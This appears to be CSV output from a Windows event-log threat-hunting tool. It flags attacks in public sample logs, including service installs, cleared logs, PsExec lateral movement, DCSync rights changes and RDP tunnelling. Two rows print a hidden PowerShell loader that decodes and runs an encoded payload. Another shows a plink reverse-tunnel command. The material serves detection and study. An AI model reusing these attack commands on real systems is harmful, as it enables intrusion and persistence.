2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx
2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
